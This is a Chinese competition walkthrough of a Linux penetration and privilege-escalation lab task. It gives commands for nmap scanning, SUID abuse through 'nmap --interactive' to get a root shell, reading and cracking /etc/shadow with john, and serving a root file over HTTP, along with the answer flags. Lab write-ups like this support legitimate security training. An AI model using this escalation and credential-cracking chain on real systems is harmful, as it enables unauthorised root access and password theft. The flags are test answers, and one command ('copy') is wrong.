2023年中职“网络安全“—Linux系统渗透提权③

本文详细介绍了2023年中职网络安全课程中的Linux系统渗透提权任务,包括信息收集、SSH端口号、主机名、内核版本获取,以及管理员提权获取文本内容、密码和图片旗标的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Linux系统渗透提权

任务环境说明:

  • 服务器场景:Server2202(关闭链接)
  • 用户名:hacker密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析


flag: 22/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

uname -a            # 输出操作系统信息


flag: Kiowizity

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a            # 输出操作系统信息


flag: 3.13.0-45-generic

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

ls /root
cat /root/adftutij.txt


flag: hyjufk983

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件

nmap --interactive        # 进入nmap交互模式
!sh                       # 执行sh
id                        # 查看id
cat /etc/shadow           # shadow 文件保存密码

vim hash        # 把root信息行写入进去
cat hash        # 查看是否赋值成功
john hash       # 破解hash


flag: 0987654321

6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

pwd                                # 查看当前目录
copy /root/flag.jpg flag.jpg       # 复制过来
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务

注意一定要加:8080 指定HTTP端口


flag: 2022_year_Skill_competition

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值